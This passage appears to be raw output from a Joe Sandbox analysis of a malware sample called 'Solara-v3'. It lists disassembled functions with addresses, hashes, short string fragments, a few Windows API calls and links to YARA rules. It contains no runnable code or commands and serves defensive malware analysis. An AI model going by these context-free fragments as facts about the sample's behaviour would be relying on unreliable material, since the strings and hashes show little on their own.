                                                                                                                                                                                                                                              • Instruction ID: 7334df959159416c48e382d616d244ce160e02f9129f40ab737ecec1edd4b52a
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: abc874c9909978c4c67d63b3286c9fd06b2b4f2b84e92e02f925d395bc13f45d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 70B1E3B04083829BE728CF81C69576BBBF1FF85748F105A8DE5951B290D3F98648DF86
                                                                                                                                                                                                                                              Function 00425770 Relevance: 7.7, Strings: 6, Instructions: 226COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: M2x2$c2o2$m2?2$o2x2$u202$}2q2
                                                                                                                                                                                                                                              • API String ID: 0-1290146539
                                                                                                                                                                                                                                              • Opcode ID: 9de3aaf11f0e2ee482b38c0393ecb77c9407e30e746739f3fde1d6b151a35207
                                                                                                                                                                                                                                              • Instruction ID: 3246baa6c9dc81b657b25537a01d6a69c66a68c26ad81c28aa9a33eac08b7532
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9de3aaf11f0e2ee482b38c0393ecb77c9407e30e746739f3fde1d6b151a35207
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 176142B1A08760DBD320DF15D98166BB7F1FFC1314F48892EE8855B394E7B98904CB8A
                                                                                                                                                                                                                                              Function 00426990 Relevance: 7.6, Strings: 6, Instructions: 104COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: %M)M$)M-M$-M M$4M:M$>M5M$MM
                                                                                                                                                                                                                                              • API String ID: 0-1618744259
                                                                                                                                                                                                                                              • Opcode ID: 26d9f920b7d13b0cf1986f7dc4a40b8815e4dcf4f67e7bb9ab91444ec8e3532c
                                                                                                                                                                                                                                              • Instruction ID: 78049ae23b19002676e268f95cda996eb32204798bfd1804e00c4afc25085f20
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 26d9f920b7d13b0cf1986f7dc4a40b8815e4dcf4f67e7bb9ab91444ec8e3532c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3441BCB061D3948AD3249F24E841BABBBB5FF81318F46482DE4C89B315E73A8445CF5B
                                                                                                                                                                                                                                              Function 00419930 Relevance: 6.8, APIs: 2, Strings: 1, Instructions: 1513COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 0043CD20: LdrInitializeThunk.NTDLL(00423382,00000002,00000014,000000FF,00000000,?,00000002,?), ref: 0043CD4E
                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?), ref: 0041A030
                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?), ref: 0041A0CE
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: FreeLibrary$InitializeThunk
                                                                                                                                                                                                                                              • String ID: Fn@n
                                                                                                                                                                                                                                              • API String ID: 764372645-2265005453
                                                                                                                                                                                                                                              • Opcode ID: 2d1d47e55f584641a642691e4c6c39e2cddd0be4ead511b4d778223cc5cbb54d
                                                                                                                                                                                                                                              • Instruction ID: 131018062a82d736fa47d298312175603f5847d79bc8a07e9cfe404f1bf231df
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2d1d47e55f584641a642691e4c6c39e2cddd0be4ead511b4d778223cc5cbb54d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2CA223766093009FD720CF24C8807ABB7E2BFD4314F19482EE9C597351D7BAAD95878A
                                                                                                                                                                                                                                              Function 00418170 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 419COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 004184AC
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                                              • String ID: S-#9
                                                                                                                                                                                                                                              • API String ID: 237503144-700798346
                                                                                                                                                                                                                                              • Opcode ID: e2bc158481f8dfbd2a657db23a5401f3c476d650ecf493c40db5d62b40362113
                                                                                                                                                                                                                                              • Instruction ID: 52d3a1a22797bc6ff2ef723818d6b4c880c4da0e2c4bb0917b947ec637b9ef44
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e2bc158481f8dfbd2a657db23a5401f3c476d650ecf493c40db5d62b40362113
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C4E1E876A046128BC724CF28C8517ABB7E2EFD4324F19892DE8C997394EF38D941C745
                                                                                                                                                                                                                                              Function 00409570 Relevance: 5.4, Strings: 4, Instructions: 366COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: E38030A6CBA13717BCFD68B774EF9B7A$bC$mX$pid
                                                                                                                                                                                                                                              • API String ID: 0-2736358017
                                                                                                                                                                                                                                              • Opcode ID: 38a496d1901cb9fc1a1a81ae934acbfbe9411e11b166e4a8648ed1bfe5718dba
                                                                                                                                                                                                                                              • Instruction ID: 78aa410c3e571a3c71217f04774d552cfb36f3c011885ca35bd8ebc00676843d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 38a496d1901cb9fc1a1a81ae934acbfbe9411e11b166e4a8648ed1bfe5718dba
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 44C125B15183118BD328CF24C8516AFBBE5FF84304F15492DE5AAEB3A1E738D904CB86
                                                                                                                                                                                                                                              Function 00429630 Relevance: 2.9, Strings: 2, Instructions: 402COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: 517$02"4
                                                                                                                                                                                                                                              • API String ID: 0-4117730321
                                                                                                                                                                                                                                              • Opcode ID: 9280ced3489e90234081316888d5cbab1c25a6192fcd2380d66ea8f60e248077
                                                                                                                                                                                                                                              • Instruction ID: 788614aa283ce937e0284b5c45e1a05101e09933b0675d27cc46c1417dc3c243
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9280ced3489e90234081316888d5cbab1c25a6192fcd2380d66ea8f60e248077
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D2D13475A0C360DFD3049F28E89166BB7E1AF8A314F858A2DF4C5973A1D7399C40CB4A
                                                                                                                                                                                                                                              Function 0043DB39 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: @$@
                                                                                                                                                                                                                                              • API String ID: 0-149943524
                                                                                                                                                                                                                                              • Opcode ID: 5b2196727f174ea9b258481d9f67c76f8990f14b878419990b001dbcc1b4b103
                                                                                                                                                                                                                                              • Instruction ID: 482e6149b56366e601b592d2c8ef6da79fc9784322df0be9e518e1d530d1ba80
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5b2196727f174ea9b258481d9f67c76f8990f14b878419990b001dbcc1b4b103
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4C51E3B1A183208BD714CF28D96032BB6E2EFD9745F04A52DE4C597394E7399C08C78A
                                                                                                                                                                                                                                              Function 0043E710 Relevance: 1.9, Strings: 1, Instructions: 647COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: "C
                                                                                                                                                                                                                                              • API String ID: 0-2206442469
                                                                                                                                                                                                                                              • Opcode ID: 41898e06d329f9b7dcce93df1159e086aaf4499670247650b597e40a1912500f
                                                                                                                                                                                                                                              • Instruction ID: 56effb05c55d5e723ed47e9df777c39648b717dc24fdb7399af3515154e224fe
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 41898e06d329f9b7dcce93df1159e086aaf4499670247650b597e40a1912500f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8F121239A18215CFC704CF28E88026BB3F2FF8A315F0A987DD945873A1EB359955DB85
                                                                                                                                                                                                                                              Function 0043E820 Relevance: 1.8, Strings: 1, Instructions: 567COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: "C
                                                                                                                                                                                                                                              • API String ID: 0-2206442469
                                                                                                                                                                                                                                              • Opcode ID: 97ee515db7b271821da0c5f6ee7e03195be19e2c0d651d664716e8c5a31a3625
                                                                                                                                                                                                                                              • Instruction ID: 24bd7fce4cce9c11c14dc7089d7bdd62ad2ae41bb7aab5742507e38462b34f06
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 97ee515db7b271821da0c5f6ee7e03195be19e2c0d651d664716e8c5a31a3625
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CE021135A18211CFC714CF28E8806ABB3F2FF8A315F0A987DD945973A1EB359851DB85
                                                                                                                                                                                                                                              Function 00416777 Relevance: 1.8, Strings: 1, Instructions: 533COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                                                              • String ID: mA
                                                                                                                                                                                                                                              • API String ID: 2994545307-377813790
                                                                                                                                                                                                                                              • Opcode ID: f9881b5a2c76e10fa2e14fc1381623fcfa37601e07420e4b32e876335f5bb1c0
                                                                                                                                                                                                                                              • Instruction ID: 39428711870aab526ad74d1bb6706073ceab97bda494de927c3493c7e305c467
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f9881b5a2c76e10fa2e14fc1381623fcfa37601e07420e4b32e876335f5bb1c0
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DCE199769187108BD728CF28C8503BBB7E2EFD5310F1A493DD8C6973A1DA399885CB95
                                                                                                                                                                                                                                              Function 0043E920 Relevance: 1.7, Strings: 1, Instructions: 484COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: "C
                                                                                                                                                                                                                                              • API String ID: 0-2206442469
                                                                                                                                                                                                                                              • Opcode ID: fb77efca3cbf5cf22c915da0be89c3815572e68ec3722750ab8f79a114db9d3f
                                                                                                                                                                                                                                              • Instruction ID: ce5334b28f323dc069e6442ef19ad98089a48ff52a3e4ef105bcb35b847b58c7
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fb77efca3cbf5cf22c915da0be89c3815572e68ec3722750ab8f79a114db9d3f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3FF10035A18211CFC718CF28D8906ABB3F2FB8A311F0A947DD945973A1EB35AC50DB85
                                                                                                                                                                                                                                              Function 0043EA60 Relevance: 1.7, Strings: 1, Instructions: 476COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: "C
                                                                                                                                                                                                                                              • API String ID: 0-2206442469
                                                                                                                                                                                                                                              • Opcode ID: a75888721bd5923d498735bce53f8da3f0b87054ba0c149046fbca936bc988e0
                                                                                                                                                                                                                                              • Instruction ID: 17999f29168490a76054be163b7d9b156083f59d85bc034f3f9228317ffeb93c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a75888721bd5923d498735bce53f8da3f0b87054ba0c149046fbca936bc988e0
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 26E11436A08215CFD718CF29D85026BB3E2EF8A300F0A987DD986973A1EB359941DB45
                                                                                                                                                                                                                                              Function 0043E9D0 Relevance: 1.7, Strings: 1, Instructions: 446COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: "C
                                                                                                                                                                                                                                              • API String ID: 0-2206442469
                                                                                                                                                                                                                                              • Opcode ID: cba630364bba8203fdcf11e63c032526e89e4d0b176a92fde8c55d32542c480f
                                                                                                                                                                                                                                              • Instruction ID: 9f29137a07e53c7061bb74c7e8dbeff543532e97d29f2676d67eacb0b8170105
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cba630364bba8203fdcf11e63c032526e89e4d0b176a92fde8c55d32542c480f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 50E1F135A18215CFCB14CF28D8806ABB3F2FB8A311F0A987DD945973A1EB359D41DB85
                                                                                                                                                                                                                                              Function 00408E50 Relevance: 1.5, Strings: 1, Instructions: 272COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: XqR
                                                                                                                                                                                                                                              • API String ID: 0-4205905425
                                                                                                                                                                                                                                              • Opcode ID: e9b549860dc5eecda24e6e66b7a3a99159d9fe7ee378efa78ee88bba9d1439d5
                                                                                                                                                                                                                                              • Instruction ID: 4862d3e840e305e59ef710783f63dda1766adffe072164391312256b8460724a
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e9b549860dc5eecda24e6e66b7a3a99159d9fe7ee378efa78ee88bba9d1439d5
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5D71F33054D3858AD310DF79D0A036BFBF1AFA6340F08456DE8C5AB386D77A8909C79A
                                                                                                                                                                                                                                              Function 00421E60 Relevance: 1.5, Strings: 1, Instructions: 269COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: ''
                                                                                                                                                                                                                                              • API String ID: 0-2284169615
                                                                                                                                                                                                                                              • Opcode ID: df89156451dc4e30c0006a9843085f9e270a73dd83cd9c4906fd0cc441646c2f
                                                                                                                                                                                                                                              • Instruction ID: e6068bda0526af99a2bdf8ffdafc3c168081ed94b6e207db80534ad17edd005a
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: df89156451dc4e30c0006a9843085f9e270a73dd83cd9c4906fd0cc441646c2f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E57111B0704310ABD7109F24DC82B7773B4EF90318F54491DFA968B2A0E7B9D904C76A
                                                                                                                                                                                                                                              Function 004195FD Relevance: 1.4, Strings: 1, Instructions: 199COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: Q R
                                                                                                                                                                                                                                              • API String ID: 0-3646680613
                                                                                                                                                                                                                                              • Opcode ID: 32d966ae9fdab9915fb8afc0a06445e1c5604de388feaf4180a495f8dbdd9674
                                                                                                                                                                                                                                              • Instruction ID: 7bf4d4fac1c2ed1ff738cb4123fc0873976e416dc6a74a417e5fd2f71957197f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 32d966ae9fdab9915fb8afc0a06445e1c5604de388feaf4180a495f8dbdd9674
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1F41AF70504210DAC7289F24C8A56B7B3B6FFA2354F05461DE8DA5B3A1EB394D81C796
                                                                                                                                                                                                                                              Function 0042B48C Relevance: 1.4, Strings: 1, Instructions: 196COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: EVJ_
                                                                                                                                                                                                                                              • API String ID: 0-352177915
                                                                                                                                                                                                                                              • Opcode ID: 4f677c5bacfc321699cb78afe51e88b79b6ee33044fbd01274c2f648ee761e36
                                                                                                                                                                                                                                              • Instruction ID: 53c7e9f4a335b1037adbc3e9afbb4642460edb32f2ec1fe4851bf9c39eef3fa3
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4f677c5bacfc321699cb78afe51e88b79b6ee33044fbd01274c2f648ee761e36
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9B5135316093914AD725CF29D4503ABFBE2EFE7304F28C4ADC0C99B291DB3844068796
                                                                                                                                                                                                                                              Function 0042B841 Relevance: 1.4, Strings: 1, Instructions: 180COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: Nv
                                                                                                                                                                                                                                              • API String ID: 0-2521146493
                                                                                                                                                                                                                                              • Opcode ID: 2b352689b6d2e18ffca85da9fb8aa7ecc475735d32d62c09c8db4a7d2352111c
                                                                                                                                                                                                                                              • Instruction ID: 3f7c8bd47a3eef01d4260e4ffcd1b4165a6c5dfd35694485603fb84523fdf014
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2b352689b6d2e18ffca85da9fb8aa7ecc475735d32d62c09c8db4a7d2352111c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7D51F4756082918BD329CB25D8507FBB7E1EFD6304F58986EC4CAD7250DB3848458B96
                                                                                                                                                                                                                                              Function 0043FF00 Relevance: 1.4, Strings: 1, Instructions: 158COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                                                              • String ID: @
                                                                                                                                                                                                                                              • API String ID: 2994545307-2766056989
                                                                                                                                                                                                                                              • Opcode ID: 30bc9f3443d8bff787af8f28f6ec9a1784be8cf9562241054020a525d8a93fcf
                                                                                                                                                                                                                                              • Instruction ID: ff7e50e45248f1a8974a5061f60a754f092605ea59ae7395ab4f9fb307478800
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 30bc9f3443d8bff787af8f28f6ec9a1784be8cf9562241054020a525d8a93fcf
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FC416672A053009BD7148F24CC15B6BB7E2FFC5328F19952DE9851B3A0E7799815C78A
                                                                                                                                                                                                                                              Function 0040C942 Relevance: 1.4, Strings: 1, Instructions: 141COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
